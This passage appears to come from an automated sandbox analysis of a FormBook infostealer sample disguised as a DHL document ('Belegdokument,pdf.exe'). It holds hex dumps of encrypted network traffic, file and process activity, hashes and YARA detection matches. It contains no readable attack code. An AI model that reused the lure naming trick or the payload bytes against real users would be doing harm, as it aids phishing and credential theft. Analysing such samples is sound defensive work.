98 aa 7f 83 60 55 f1 3e 13 46 eb b5 d4 43 21 8a c7 ee 33 3c a7 a2 e4 28 fd d0 12 4b 19 0f a8 Data Ascii: "wuY;GDLbPN0]z*JlzbX,#_+iJ6Gebs(v5wBn@jYP[QC3$dT9fOwJp7mlM/iQYmK( EWU-W }lFPmE, avODOÙ>FC!3<(K

2021-10-23 05:59:17 UTC 55 IN Data Raw: a9 c8 06 e5 6e 10 bf e9 70 ee 57 91 43 cc 52 54 2c 81 e5 bb 86 74 7e b2 21 58 f9 6b bc 5b 48 fc 77 8c c5 62 36 e4 2d f7 66 b0 0b 84 84 6b 08 ec 44 e9 45 7e 2c ff 2c 71 16 39 be 98 33 65 9d 56 18 a0 69 02 84 bc a0 8a 84 2c 34 53 7b c8 5a ec 77 04 9b 0e 05 7c 8a 64 b5 06 77 a0 95 29 5c a9 a1 b3 a2 5c 0d fc 1a 00 de bc c0 69 22 f1 50 ae df d2 64 f8 0c e0 84 54 70 df e1 54 f8 8c 7f b4 35 48 ca ad 36 b9 ed 6b ed 49 97 ae d0 f8 9f d9 57 a8 e7 8d 7c 35 73 09 59 90 24 b0 d3 d4 12 38 c7 cf 04 96 e2 ca d1 3e 7e ff 29 7c 39 51 01 b2 1a 4b e4 1d ca 53 14 b5 0e 80 68 23 05 2e 2b b8 54 fc a0 56 9d 98 ee 2b 96 60 91 3c 01 7c 1d 4a e0 bb 4a 20 c1 39 7b 0a ea 29 a2 80 fe 20 45 7f 1c c0 a3 ab 7b 08 50 5c f5 c7 a0 c5 0e a0 c5 7c 1e f8 16 0e 31 20 64 bc b7 f0 63 9f 9b 11 e6 Data Ascii: npWCRT,t~!Xk[Hwb6-fkDE~,,q93eVi,4S{Zw|dw)\\i"PdTpT5H6kIW|5sY$8>~)|9QKSh#.+TV+`<|JJ 9{) E{P\|1 dc

2021-10-23 05:59:17 UTC 64 IN Data Raw: dd ef e6 d0 2e 29 62 3b ab b9 e5 c1 db 38 7f 66 c1 27 05 69 aa b9 c5 6d 6a fb d9 45 32 01 7c 70 80 17 d0 6f 9f 4e 69 a3 bb 61 57 f2 93 3d 01 e4 ba 3e 1a a5 e1 9d b0 a6 58 2b 19 c5 e9 ec 39 92 6b 53 09 2a 89 de 2d d0 71 bc 03 ab 1b e8 eb 03 33 cc 51 be 22 04 ff 8b 1b 84 5f bd 27 86 b9 a8 53 18 34 e5 60 4e 77 fd 39 83 e6 89 50 fa d9 76 88 b4 2d 1f aa 2e 2a ba 0d d8 2b 49 a8 45 cc 10 58 39 28 b2 1d b2 71 4b 73 a8 e2 1b b8 5f ac a7 63 1b fa 05 ce 61 60 dd 2a 8c e5 fb 9a 07 ad f0 b7 47 92 ad 35 97 b7 96 6f 06 7b ff b7 fd b4 eb 27 7a cf 6a af 7c fe e7 02 88 c5 7d 03 7f fb ed 65 5a 70 0f 5e 9f 1f 89 8b 16 5a 8f 0b 74 34 d8 7b 19 ae c6 f2 73 27 c6 9f ad 15 78 c3 f1 9e ae de 41 6e cd fa 8b de 96 91 79 aa 53 f9 1b 4a fa 26 67 28 f6 b9 4f 59 1a 36 3e dd b4 d3 84 08 Data Ascii: .)b;8f'imjE2|poNiaW=>X+9kS*-q3Q"_'S4`Nw9Pv-.*+IEX9(qKs_ca`*G5o{'zj|}eZp^Zt4{s'xAnySJ&g(OY6>

2021-10-23 05:59:17 UTC 78 IN Data Raw: 43 14 c9 bd 9a 0b 49 dc a0 38 6b 60 a3 c1 02 72 c6 33 1e 98 6e 1a f7 14 40 db b4 7a 9a 00 82 2b 3d 25 de 6d 71 78 f2 0f d0 09 e4 30 2b 5b 4d da 9e 27 ed dc 4d 68 dd e8 29 d4 a2 c0 78 5b 49 c0 a0 38 6b 60 a3 c1 02 72 c6 33 1e 98 6e 1a f7 14 1d 1b f2 a7 d2 0c 33 b0 0c 0d e9 de 95 ae 5b e7 75 86 0f 90 61 3b 0f 1b 9e 27 ed dc 4d 68 dd e8 66 a5 e7 89 2b 07 a0 d6 a0 38 6b 60 a3 c1 02 72 53 e3 26 77 50 d9 99 81 a0 ca 68 a4 8e 79 33 9f 02 af 8d 07 6c 30 a1 d8 40 f7 94 06 d8 f0 8f 3f 9e 27 ed dc 4d 68 dd e8 87 f0 11 3a f3 e6 96 96 a0 38 6b 60 a3 c1 02 72 63 e8 ac ca 3c a7 07 f2 22 49 fb 81 40 b4 af 1d 2a b3 64 42 84 89 0b a7 75 91 f0 cc ce f6 a2 9d 9e 27 ed dc 4d 68 dd e8 35 b9 1b 30 da 9e c8 a4 a0 38 6b 60 a3 c1 02 72 d9 90 48 ed c6 d7 36 bd 16 d0 74 6e ac e1 81 Data Ascii: CI8k`r3n@z+=%mqx0+[M'Mh)x[I8k`r3n3[ua;'Mhf+8k`rS&wPhy3l0@?'Mh:8k`rc<"I@*dBu'Mh508k`rH6tn

2021-10-23 05:59:17 UTC 93 IN Data Raw: e4 8a fe e9 7a d5 5d 38 9d 5e cc 48 6c d5 5e b8 72 59 38 f9 72 a0 f7 66 64 b2 8b 62 bc b4 33 b4 8c 80 f8 fc cc 5d 5e 05 8f 55 42 5a e1 54 60 cb 7a 38 da 49 a3 9e f3 d1 3b 6b ea b8 ed f9 89 3a 8d 67 49 c2 b9 e4 ca 4e ba dd ad f1 fd 1e 76 14 74 68 d8 9d 90 37 28 c1 04 a4 9b 72 04 77 31 2b 3a bd 5b dc e4 7f f3 89 c8 2c 5c e5 6b b7 dd d8 d4 26 2f 5e 08 f4 f5 79 ab 9f a8 6e 23 2c ca 22 f2 61 6a 4f 86 b7 58 14 90 55 f6 61 8d 67 bc 0a e2 b3 d6 b9 11 c4 9d 8a e8 66 aa 4b c1 4ada 6c c6 65 07 96 c0 5e 92 75 bb 26 13 9c 98 35 9e 2f 88 45 d4 ee 67 13 e0 d4 66 82 b9 7a fa 1e bd dc 70 9c af b4 64 fb 2b ac d2 52 b4 dc 46 6c c3 8e 12 96 ac e6 10 90 18 85 0e cd 7d f0 02 ba 14 32 a8 ca 3b 28 9e 0e 0f cc f5 78 65 b4 b2 c0 f9 a3 aa 51 bc 93 1f 33 27 f7 15 d8 a2 c3 cd 39 09 Data Ascii: z]8^Hl^rY8rfdb3]ÛBZT`z8I;k:gINvth7(rw1+:[,\k&/^yn#,"ajOXUagfKJleû&5/Egfzpd+RFl}2;(xeQ3'9

2021-10-23 05:59:17 UTC 96 IN Data Raw: ce 42 1a b7 b8 06 92 84 9d 9c b5 7a 86 58 2f c1 ea df 16 69 65 69 b4 78 8b 6a 86 66 d2 24 0d 31 d6 f6 0c 48 c1 8e d1 d3 ee 9c 18 c7 1e 27 b0 57 b9 d2 ef cb 4c 0b c9 b3 65 35 95 55 c4 58 9d d7 58 71 d9 03 75 49 ff f3 5a 2c df 76 27 e7 45 b1 2b 19 d7 fa 54 30 ca 2f 47 55 77 14 60 24 57 e6 96 07 bc 20 41 ce ff 95 88 f6 41 6c 82 4c 96 9e b5 09 09 27 bd e2 0e a0 5e 73 08 f9 9f 5e 0d 4b 9a 1e a8 35 85 20 cd e0 c3 9c 2a a1 c6 2e 27 eb ce 19 ce 3a fc 86 35 57 58 de 43 eb 5f aa 37 c4 cc e0 2d e9 eb c2 6c bb da 66 3c 4d 13 fa 1a e7 b6 ed e2 13 6a c5 db bd ea 08 dc 92 d1 48 c0 b8 7f 5e 62 d6 b6 75 1f 86 9e 82 d4 a2 07 4f 50 0a 88 a7 9f 1e fb 66 b6 0f 38 ce f9 2c 87 88 73 2f ff de 38 6c b8 8d da 71 18 de eb 51 e9 06 d9 7b 86 6c a5 73 d9 9a bb 4d bc 85 0d ca 48 3f 73 Data Ascii: BzX/ieixjf$1H'WLe5UXXquIZ,v'E+T0/GUw`$W AAlL'^s^K5 *.':5WXC_7-lf<MjH^buOPf8,s/8lqQ{lsMH?s

2021-10-23 05:59:17 UTC 112 IN Data Raw: 0b 6b e1 b9 d3 f9 67 a1 77 10 bf 5d af e5 25 97 c2 7b 3f f0 4a 70 fd a4 82 97 8b 7e e7 70 82 aa 22 56 71 d8 03 cf e0 a6 d4 8e 62 a1 8e 8b 6d 14 9a 3b 71 db b5 19 e6 c0 c6 dc d4 cb 8b ef 13 3c 4c ee b0 58 5c d7 f3 92 b9 7e 0e b7 39 50 db b4 34 a6 eb 0f 6d 16 1a 52 c8 d3 06 fb f7 63 c5 0d 9a 19 d8 a6 e6 1a d0 62 a9 73 f2 a6 31 67 2a aa 9d 17 ea 56 0b fa 59 b1 f2 de d3 61 f2 6b e6 3c b7 c7 f1 dd 8a b6 c8 a2 ec 42 31 3d a4 77 1f a1 c5 a4 3c 77 1f 2b 98 51 bb 38 2b e3 c6 983d 13 fb 42 78 32 aa 84 ed 6c 6e 27 8c 20 48 d8 16 47 35 b3 43 7c 09 10 94 03 82 88 da ee 8c d4 4c e4 6b f8 e4 ce 6a f8 40 e9 cd 87 0d f2 4c 01 eb dc 08 56 cf 0d 35 f7 fa 01 be 7b f1 02 2e 81 cf 3d 6c d8 71 b0 5f 31 47 69 f1 60 03 45 c0 e9 b4 06 d8 22 22 52 98 6d e8 97 f5 80 4a 6e 6f 99 08 Data Ascii: kgw]%{?Jp~p"Vqbm;q<LX\~9P4mRcbs1g*VYak<B1=w<w+Q8+=Bx2ln' HG5C|Lkj@LV5{.=lq_1GiÈ""RmJno

2021-10-23 05:59:17 UTC 128 IN Data Raw: b2 45 ab 86 47 5c f4 a5 ee 85 bc 33 9c e7 e4 cf d9 52 7f ad b0 0f a8 ad d4 ba b7 f5 2c 3b d7 77 a2 2e ef b4 51 77 37 62 e9 45 8e 05 e7 2d cd 61 3e 8a 34 a0 7d 9e 3f d9 1f e4 69 ba d6 5b e7 38 a7 2d 2c 6c 20 86 eb 53 d0 35 36 0a 1b 79 5b 9e 09 98 9c d3 0c 7a 42 a3 eb 41 7e 21 60 8a c7 4a 13 5a a9 4c a4 30 a5 e5 07 41 3f 52 23 94 38 08 80 df ee 10 37 53 74 18 73 a0 2f e2 fe a8 48 44 cb c2 08 d7 c7 37 0f 1d d7 ab 9c 21 b3 0c 9a 47 75 8b 57 7d 46 a9 c5 a3 4b 08 df 22 39 57 6b 9e e4 bf 98 85 1c d3 61 7b 1e 65 f2 4f 5a 81 0c a1 2e 80 c3 e5 55 ef 86 2e 84 44 57 5d 38 93 ca 77 aa c5 ef b1 7d 1e fb 8b 92 e0 62 ac 4e d5 ab 63 5d 6f ea 5c f8 f2 63 ea a6 33 26 b8 4b c6 c4 bf 40 f7 f3 bc e2 f5 4e bb 0e df 18 de ca dc 3c 92 e8 f5 82 8b 3e 10 bd 40 a6 a4 84 0d 30 22 d7 Data Ascii: EG\3R,;w.Qw7bE-a>4}?i[8-,l S56y[zBA~!`JZL0A?R#87Sts/HD7!GuW}FK"9Wka{eOZ.U.DW]8w}bNc]o\c3&K@N<>@0"

2021-10-23 05:59:17 UTC 144 IN Data Raw: 4b dd f1 ec 09 2f 78 08 3b 53 41 2a 7f f9 47 17 43 c0 c4 49 91 a2 e4 c5 21 e6 a8 88 68 d8 8d 73 29 78 1f f4 07 68 23 32 02 d3 66 02 84 0d be 12 c4 fe f4 78 26 17 e4 46 bf f8 bb da 0e e9 8e 94 0c 3d 14 ba bf b3 ee b0 6f 82 97 50 99 6b a3 92 6a f0 24 1e 9a 92 58 3b 4e 56 9d 38 08 7b 06 8b 72 05 14 57 2d a6 68 44 24 25 d7 ab 57 98 7a e1 7a f5 d2 ea 45 4b ee 0b 7b 05 0c 03 bc e3 f8 b6 31 b5 5b bf 06 81 4a 45 e9 02 58 1f 2a da 7b fc b5 a8 b7 b3 5f 17 8f ba 0d c6 97 d8 39 68 3b dd 7e 7a a8 0d c2 fb 63 e6 40 38 e0 fb 8b 43 a3 f2 88 db cf 9d e8 a1 f9 8a ae cd 39 ad fa d4 c7 16 f6 2e 96 69 d9 07 1b ae 88 31 ff 0d f5 89 53 ef 95 47 67 a9 02 18 53 1e 8a a4 95 7b 69 54 48 b7 3f 8c 02 43 e9 a3 8e 69 82 f8 d7 ed 01 9b 96 9d 8c e3 e8 eb bc 33 8a 0f 7b 09 e3 a2 f8 d4 77 Data Ascii: K/x;SA*GCI!hs)xh#2fx&F=oPkj$X;NV8{rW-hD$%WzzEK{1[JEX*{_9h;[email protected]{iTH?Ci3{w



Code Manipulations

2021-10-23 05:59:17 UTC 160 IN Data Raw: 6c 5f d5 6d ff 0e 42 5e f3 de d3 aa 3b a7 31 e5 8a ca fe f9 f1 dc 7d b7 cf fb 77 f7 9b 18 0e 53 af 99 ed 8d f0 e1 71 61 05 e7 33 ca e4 02 49 a0 04 ec c0 3d 09 1f f1 d4 0e 79 c5 14 5c 44 af df a9 8f bc 38 72 df 2d 5b 81 fe 39 fb 19 a2 96 48 db fa 88 3d ef e9 08 ea f2 8a b5 a5 e3 b2 47 cb fb a5 1d 7f f2 3b 60 52 ed ef bc 8d 65 f3 42 9d ad 4d f4 72 b5 dd c1 f2 11 79 51 33 06 b3 40 79 99 63 14 dc db 2c 8f 29 69 58 ec 6e d0 d2 2a 7e f6 7c ff f4 22 36 12 03 de 97 3d 80 bb eb 7a c2 e6 a4 42 65 a8 19 bf 3d 21 df e1 a8 c6 88 31 71 17 c4 44 aa 88 77 d5 1b 57 92 28 6d f3 d6 79 8f c7 c3 bb a3 74 15 e6 d3 27 88 4c 90 3e db e0 f9 d6 40 d7 99 ef be 07 4b 85 28 1e ab fb 98 e1 eb 91 0d 4a 5c 6c 7e 8d 4f f9 b8 99 02 88 1d 8d de e7 14 2a 2b 52 ae 68 f9 0c 5b f0 0f 97 b4 33 Data Ascii: l_mB^;1}wSqa3I=y\D8r-[9H=G;`ReBMryQ3@yc,)iXn*~|"6=zBe=!1qDwW(myt'L>@K(J\l~O*+Rh[3

2021-10-23 05:59:17 UTC 176 IN Data Raw: bd 4c bc 64 e1 76 9e 86 70 d4 9a ae e4 83 ad 65 85 1f 09 bf f0 ce 05 d9 e6 45 d3 c3 ac fd b9 04 b0 bc da 1b fd 27 b3 61 d1 55 05 79 f4 5e a4 cd ca a9 a4 08 3e f4 4a 30 3a b8 a0 fa db 23 e1 d7 43 ac 8c 63 e2 01 7a 14 c5 11 2f 0b b9 f8 6b 3a 70 82 b5 2f f9 60 d2 3b fa af 76 d4 d4 92 72 79 35 b7 aa 33 1f 10 eb d2 33 21 72 1a 66 6f 11 d2 2f fe 16 34 7e 59 90 ec 4d db 73 bf f0 0e 68 8e ac cf 1e 6e ac da 74 fb 67 c6 3a b8 29 73 34 df 56 5a c3 8f d4 32 37 18 ca fd fd 3b f8 a8 f4 33 05 e4 d2 da 19 90 78 c3 1d 68 bf a1 96 a4 c4 d1 5e ea 0d 4c af 14 d3 67 e1 78 5a e5 e3 ff 54 2a 15 8b 2a 64 89 38 ff a3 05 40 3e 84 02 36 e6 2c 1b b5 65 9b f6 a4 5e ec 95 a2 71 ad 7a 69 3f 36 a9 45 18 8c db ac 6b 5d 49 c4 2b 7b 0b 1a 80 1e f4 c2 f1 29 94 8b 1a c5 4d 1b e6 02 8c 37 3f Data Ascii: LdvpeE'aUy^>J0:#Ccz/k:p/`;vry533!rfo/4~YMshntg:)s4VZ27;3xh^LgxZT**d8@>6,e^qzi?6Ek]I+{)M7?

2021-10-23 05:59:17 UTC 192 IN Data Raw: f8 e0 22 75 ce 7c 1d 24 de 3f a8 2a 0c 1c 50 07 11 4d 6d 34 1e f1 99 95 c3 50 1f 14 fc 1d 8c a6 17 67 d9 18 27 af 0e 8f c6 cb 83 99 83 8f 8e 20 37 6d cf 0b 63 e0 2b 86 95 c0 48 e7 c8 99 be fa c3 0f e2 e4 e6 b0 6d ff 95 e3 fb 92 e3 94 a7 38 64 8b 28 9d f4 2e c3 29 aa 2c 72 14 81 e6 e5 b5 df 8c b7 2a 6d be dd 73 28 fc ab 80 84 90 e5 ea c3 ec 9b 99 d7 5d 1c 1d 1c e8 d0 38 30 d4 f0 21 d4 ff c7 30 e6 66 a8 e6 39 97 90 c7 c0 aa ed 11 a1 ef 8c 2b 5b ca 6a 16 b8 d8 a1 46 dd a8 d9 2f 05 4d fb 8c 5d c6 d2 c0 51 0e 79 30 69 23 27 f2 f1 3d d8 d3 ad 94 0a e6 34 43 15 69 30 8e b9 08 c2 8d e6 95 38 d3 5e 45 70 f9 9a e0 ec fe 97 bc ad 38 90 78 8e bf 59 cb d7 33 e0 13 4d 72 e9 62 21 b2 b5 46 50 67 fe 90 42 b6 b6 02 ea 1b 04 31 bf 0e 40 4b 35 fa b0 1b cb 5c ba c8 d4 3f b1 Data Ascii: "u|$?*PMm4Pg' 7mc+Hm8d(.),r*ms(]80!0f9+[jF/M]Qy0i#'=4Ci08Êp8xY3Mrb!FPgB1@K5\?

2021-10-23 05:59:17 UTC 208 IN Data Raw: 22 fa 8d df 40 42 79 5f 6e 7f 0b 08 c4 30 96 4a 46 32 91 81 3f 21 17 1b 7f 60 1f eb b7 cb d8 a0 39 58 f6 c8 17 de d3 7a af 27 9e 72 f4 7b fe 14 00 ea 7b cf 25 07 bf 98 1a a3 df 3b fe 81 2d 50 fb 73 59 8b 86 d8 2b 83 f3 99 57 3c df da 3e 1c f3 af c9 85 f5 d3 9b 3b c9 c6 6c 44 f8 a1 71 00 e8 66 59 62 9b b3 00 f4 01 e2 91 83 3b a7 ae 48 00 13 76 e5 d1 07 ab 6e cd 7a fe 3c c3 9c c1 35 43 bd 21 01 e4 94 6b 18 e5 da ef 6f 8a 34 5a bf 90 58 7f f2 e8 16 af 37 11 6a ff 38 39 2d 1c 5a 2c 1e d4 2a 9c 95 dc 1c 1d 2c 0f fe c6 9b c7 c8 14 b2 00 d5 57 b8 7b 86 6b cf c7 ac 5a 9d 72 16 31 ea 9e e5 14 7c 6f a1 4f 48 8c 3c d3 07 f0 d3 a7 27 76 ec 01 1b b0 cb 71 cc 78 4b 73 92 7c a6 c2 fc 0e bd 90 07 38 ce d5 ca dc a2 70 67 65 a4 f5 a8 40 cf bd cf 44 ad ce 22 23 e2 6a 88 da Data Ascii: "@By_n0JF2?!`9Xz'r{{%;-PsY+W<>;lDqfYb;Hvnz<5C!ko4ZX7j89-Z,*,W{kZr1|oOH<'vqxKs|8pge@D"#j

2021-10-23 05:59:17 UTC 224 IN Data Raw: b8 25 61 3e 9f fc 10 df c9 41 47 81 79 51 98 30 a8 60 f7 ba ff 1b ea 74 2b 46 25 b3 61 e1 2b d2 66 4f f1 20 0e 1d 42 99 52 c9 a4 3a df d9 e5 9c 8a ae a3 7d e8 8c fd e5 f9 66 d0 68 c2 bc 48 01 dd ef e3 bd cd dd 21 3b b8 c9 20 bf 93 bb 20 93 ff 8a fe 32 70 99 61 9b c5 df 8d e7 50 2e d4 fa a6 05 77 34 96 2c f7 6a 26 52 b7 4d 97 32 4e 54 85 55 56 d8 17 3a f6 40 18 e9 e8 ce 0d cf 14 cf 50 10 e1 a9 ef 25 2d 7a f2 86 3c a2 a0 09 42 65 84 4b e9 3c e1 d0 c9 ff c8 29 2e c1 85 b8 81 e6 2b 23 7e f9 60 47 b9 34 2c 8b eb 4a d0 52 23 9b f2 df c8 ee 33 e7 74 3e 68 f2 aa 3b b5 fe 5c 50 41 1d 73 fa ef 34 41 8b dd 3b cb 6e a7 71 d3 13 23 d3 0a 70 0f 7d c5 3e 0e 90 6a 5b 31 8f 8a e8 d7 d3 74 22 89 ca a4 95 8e 01 a6 98 d6 11 ec c3 68 f2 23 1c 20 f2 6a cf d1 d8 18 98 ef cd 65 Data Ascii: %a>AGyQ0`t+F%a+fO BR:}fhH!; 2paP.w4,j&RM2NTUV:@P%-z<BeK<).+#~`G4,JR#3t>h;\PAs4A;nq#p}>j[1t"h# je

2021-10-23 05:59:17 UTC 240 IN Data Raw: 60 af 50 7b 94 1e e5 a4 d2 bb 46 41 ba b7 c1 80 c5 86 b3 0a 12 26 3d ec 53 3a 53 e6 9b 3a bc 26 cb ef bb 09 3d ba 9b 32 a9 db 7e 36 1e 2d 6f 7a 86 ec b0 77 2b 55 4d 5e 7a 98 90 c2 9d 40 26 1f 6a 44 c7 9c 94 6b d7 a5 25 60 c2 cb 1a d0 1b 44 2b fa a9 b5 b5 e5 f3 50 e8 5a 08 6c aa 64 00 d7 f4 b2 ca a4 9e 31 6d 20 76 13 6e 81 f5 03 1c c3 a7 11 dc 85 08 a5 7e 9e f9 7f 7f ca 1b 1a 46 4a fa 8f 28 d7 e0 d5 ac f1 ad 3b 2c f8 a1 95 c5 5b d1 41 13 2e ac b4 1c c1 3a 54 5e 9f 64 ed d0 e3 1d 5f 58 8a 1d 2b 33 54 1a a8 6d 0b 61 7a 8e 18 d7 49 0e 85 86 a8 ce b3 cf 01 5b de f6 5e f4 9b a7 46 af 4d ad 5e 03 fe 9a 5e f0 11 a8 4e f9 78 49 9b f6 09 1c 54 62 1e 01 07 3b 00 e2 cd 74 04 35 9e 64 47 8b d9 db f2 30 60 49 c4 72 b1 27 89 18 74 49 1d 2b 79 de c7 88 f4 f3 ec ea f6 83 Data Ascii: `P{FA&=S:S:&=2~6-ozw+UM^z@&jDk%`D+PZld1m vn~FJ(;,[A.:T^d_X+3TmazI[^FM^^NxITb;t5dG0Ìr'tI+y

2021-10-23 05:59:17 UTC 256 IN Data Raw: bb fb 7a 2e 67 8e 31 a1 d6 84 58 ac cc 8f fe 90 17 90 a1 58 6e 4e fc da 93 57 57 68 88 5b ee ad e6 b7 df cd 87 1e db 24 23 df 19 74 10 27 7f 04 d7 5e 25 f9 e5 6c c4 38 83 b4 4e 3a 55 57 80 d9 83 c1 bf a0 21 db 86 ab 19 8b e0 3e 69 52 c8 2b 2d a5 3d 5f 63 d9 90 f3 fa 54 bf bc dc d0 36 05 5a 06 a6 99 93 29 5a d2 f6 36 21 8a 89 ce 3c 32 fb bd 83 10 0e 1e 7a 04 8a c3 c2 02 5a 5c b3 2f eb cd be 1c 45 ec df 1a 67 61 28 5b f1 b7 59 aa 08 6c 86 cb 05 32 30 a1 0f fa e8 8a 29 99 6a dd 30 91 43 dc 36 f6 3a 92 df 24 77 08 54 76 be a8 ea f6 92 23 5f fe 68 7f 9e 71 fa bd a5 61 58 1c b5 a1 ce ea 47 69 46 1a 32 a9 38 4f 85 40 30 5a 32 fd 1a 2c a8 64 1e db 9f bc 9a ef df 13 77 68 1a 97 12 4b b2 70 a2 73 b3 af ec 6a 08 a0 18 30 b8 ae 4f 0a 65 87 a9 cd a8 b7 ae 61 d1 28 9b Data Ascii: z.g1XXnNWWh[$#t'^%l8N:UW!>iR+-=_cT6Z)Z6!<2zZ\/Ega([Yl20)j0C6:$wTv#_hqaXGiF28O@0Z2,dwhKpsj0Oea(

2021-10-23 05:59:17 UTC 272 IN Data Raw: 8d bd 8f 9e 66 c6 52 ea 2e c9 2b 29 5e 95 a2 1e 2a 5f 88 16 15 fb f3 19 9a 71 66 ca 95 83 a7 c5 c8 99 f5 a5 33 f3 50 61 a4 02 5c fa 01 12 2c a2 41 7d db ed cb 58 31 77 0b 87 13 cc ef af cb a2 ce 5e 86 45 03 77 c4 64 c8 25 b9 b5 74 ee 8f ad b9 15 f2 78 b6 b0 74 dd 18 e1 0d b9 70 04 e6 6f ae d6 50 c7 65 c3 8d 4b df 60 bd 94 f8 2c c7 f5 af 6a cd 03 2d 72 35 85 69 5f 20 2c ff c4 1e fc e8 ab 33 97 47 2c de 45 75 62 eb e5 e7 cb e6 64 3e bc d3 fe 16 0e 23 34 c4 96 29 82 b8 26 94 dd ee b4 a8 b0 4a 07 00 d2 e9 b5 89 2b 5b 90 c3 70 50 c4 26 02 a7 2a 88 a2 e9 09 61 ab 28 a9 f6 d0 b2 c7 99 4c a5 5f d2 de 94 95 1d 3e df 4e 25 15 b9 a8 bf 39 b0 3f b7 f4 09 15 c2 e8 d1 d5 78 75 56 94 3f 26 c0 10 7b be df 22 f7 17 8e 39 f0 aa 4b e5 61 ba b7 ff 27 0f 0f 0a 40 1e 7d 21 4a Data Ascii: fR.+)^*_qf3Pa\,A}X1wÊwd%txtpoPeK`,j-r5i_ ,3G,Eubd>#4)&J+[pP&*a(L_>N%9?xuV?&{"9Ka'@}!J

2021-10-23 05:59:17 UTC 288 IN Data Raw: 6d c1 ce 07 28 b1 41 fb 94 34 0a f9 0e 20 de 75 2f b8 80 d5 cf 23 f8 60 e5 a7 03 80 f9 34 37 df a8 87 f2 d4 6e 19 c8 56 ad 93 4d 49 77 11 34 04 dd fb 95 d0 21 a6 bc 73 3a 51 e8 9d 69 ca 09 71 f1 b7 2f 8f fa 7f 28 ae 63 ed d3 09 65 884b 24 89 e1 40 b7 97 6d 40 97 23 99 19 9c a6 e5 a0 a5 4d bc ba d2 db 95 4c e2 ac 8b 15 4d c0 d5 94 2f d5 8e b7 57 d3 33f3 1e b1 88 2b 63 31 35 ae f9 6a 58 7a e5 fd b8 2f c6 02 90 dd 9c 58 c7 52 35 b8 23 25 fe f1 50 fc ad 11 d3 05 76 60 bb 4d fa a5 d4 c2 40 9e d8 5c 88 a0 86 96 2e c0 54 49 30 7d 95 b1 a4 99 9e f1 c2 bc f0 27 27 f2 72 65 c8 59 c3 1a d3 80 68 8f 8a 02 84 21 52 50 35 82 2b 9d e1 b2 98 fb a5 fb 3d cf c1 14 54 d5 02 0c 40 2b 9d 4a a0 42 8c 98 c2 bf 9c b3 15 2f d7 6f 0b ed c9 60 c3 a5 2d 16 c2 0e c6 3b 65 16 73 c8 Data Ascii: m(A4 u/#`47nVMIw4!s:Qiq/(ceK$@m@#MLM/W3+c15jXz/XR5#%Pv`M@\.TI0}''reYh!RP5+=T@+JB/o`-;es



Statistics

Behavior

Click to jump to process

System Behavior

File ActivitiesFile Activities

Registry ActivitiesRegistry Activities


Start date: 23/10/2021

Path: C:\Users\user\Desktop\DHL_119040 Belegdokument,pdf.exe

Wow64 process (32bit): true

Commandline: 'C:\Users\user\Desktop\DHL_119040 Belegdokument,pdf.exe'

Imagebase: 0x610000

File size: 59392 bytes

MD5 hash: D64F5D6117D03DFB20CFA1555D0F4BD8

Has elevated privileges: true

Has administrator privileges: true

Programmed in: .Net C# or VB.NET

Yara matches: Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.743735543.0000000003A61000.00000004.00000001.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.743735543.0000000003A61000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.743735543.0000000003A61000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.743683019.00000000039E9000.00000004.00000001.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.743683019.00000000039E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.743683019.00000000039E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.743573428.0000000002A47000.00000004.00000001.sdmp, Author: Joe SecurityRule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.743573428.0000000002A47000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group

Reputation: low

Show Windows behavior


Analysis Process: DHL_119040 Belegdokument,pdf.exe PID: 6884 Parent PID: 5256Analysis Process: DHL_119040 Belegdokument,pdf.exe PID: 6884 Parent PID: 5256

General

File CreatedFile Created

File WrittenFile Written

File ReadFile Read





Path: C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe


Commandline: C:\Users\user\AppData\Local\Temp\DHL_119040 Belegdokument,pdf.exe

Imagebase: 0x830000


MD5 hash: D64F5D6117D03DFB20CFA1555D0F4BD8



Programmed in: C, C++ or other language

Yara matches: Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.817684603.0000000000DA0000.00000040.00020000.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.817684603.0000000000DA0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.817684603.0000000000DA0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.741744376.0000000000400000.00000040.00000001.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.741744376.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.741744376.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.817198721.0000000000400000.00000040.00000001.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.817198721.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot comRule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.817198721.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response GroupRule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.817853007.0000000000EF0000.00000040.00020000.sdmp, Author: Joe SecurityRule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.817853007.0000000000EF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at 